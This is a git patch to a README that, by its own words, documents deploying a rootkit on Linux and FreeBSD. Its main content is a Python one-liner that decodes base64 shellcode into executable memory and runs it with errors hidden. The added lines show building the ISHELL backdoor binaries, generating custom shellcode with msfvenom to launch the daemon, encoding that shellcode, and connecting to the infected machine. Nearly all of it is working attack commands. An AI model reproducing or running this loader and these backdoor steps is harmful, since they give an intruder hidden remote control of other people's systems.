From 0bec41951c3ef89db769a61948ea9664340aac94 Mon Sep 17 00:00:00 2001
From: mephistolist <49227141+mephistolist@users.noreply.github.com>
Date: Mon, 28 Oct 2024 19:17:21 +0000
Subject: [PATCH] Update README.md

---
 README.md | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 5f39f21..14e4c9f 100644
--- a/README.md
+++ b/README.md
@@ -15,8 +15,21 @@ With FreeBSD, it will depend on the version of python installed. If you have pyt
 
 ```
 python3.11 -c 'import base64, mmap, ctypes; encoded_shellcode = "SDHJSIHp+P///0iNBe////9Iu67h2fdth+YDSDFYJ0gt+P///+L05tALH0+H5gOBibaaCKiWa53Sq9gZ7pJsgaiKvyjLqi7Y0ffEQu6Va8rhhqU6z2/l5tAZv+5P3Qyr4dn3bYfmAw=="; shellcode = base64.b64decode(encoded_shellcode); mem = mmap.mmap(-1, len(shellcode), mmap.MAP_PRIVATE | mmap.MAP_ANONYMOUS, mmap.PROT_WRITE | mmap.PROT_READ | mmap.PROT_EXEC); mem.write(shellcode); addr = ctypes.addressof(ctypes.c_char.from_buffer(mem)); shell_func = ctypes.CFUNCTYPE(None)(addr); print("...and I will not have to send a second."); shell_func()' 2>/dev/null
-``` 
+```
+
+The path to binary here in these examples is hardcoded, but you may go into the ISHELL-v0.3 folder and type 'make linux' or 'make bsd' to build ish and ishd. Then you can make your own shellcode like this:
+
+msfvenom -p linux/x64/exec CMD=/path/to/ishd -f c -b "\x00\x0a\x0d" >
+shellcode.txt
+
+You can parse out only the shellcode and base64 encode it like this:
 
-From there you may go into the ISHELL-v0.3 folder and type 'make linux' or 'make bsd' to build ish. Then you may run ish with the ip of the device the rootkit was ran on to connect.
+grep '"' shellcode.txt | tr "\n" " " | sed -e 's/\" \"//g;s/\"//g;s/;//g'
+&& echo " " | base64
+
+Then you may run ish with the ip of the device the rootkit was ran on to connect.
 
 Currently tested on x86_64 Debian Trixie and FreeBSD 14.1
+
+
+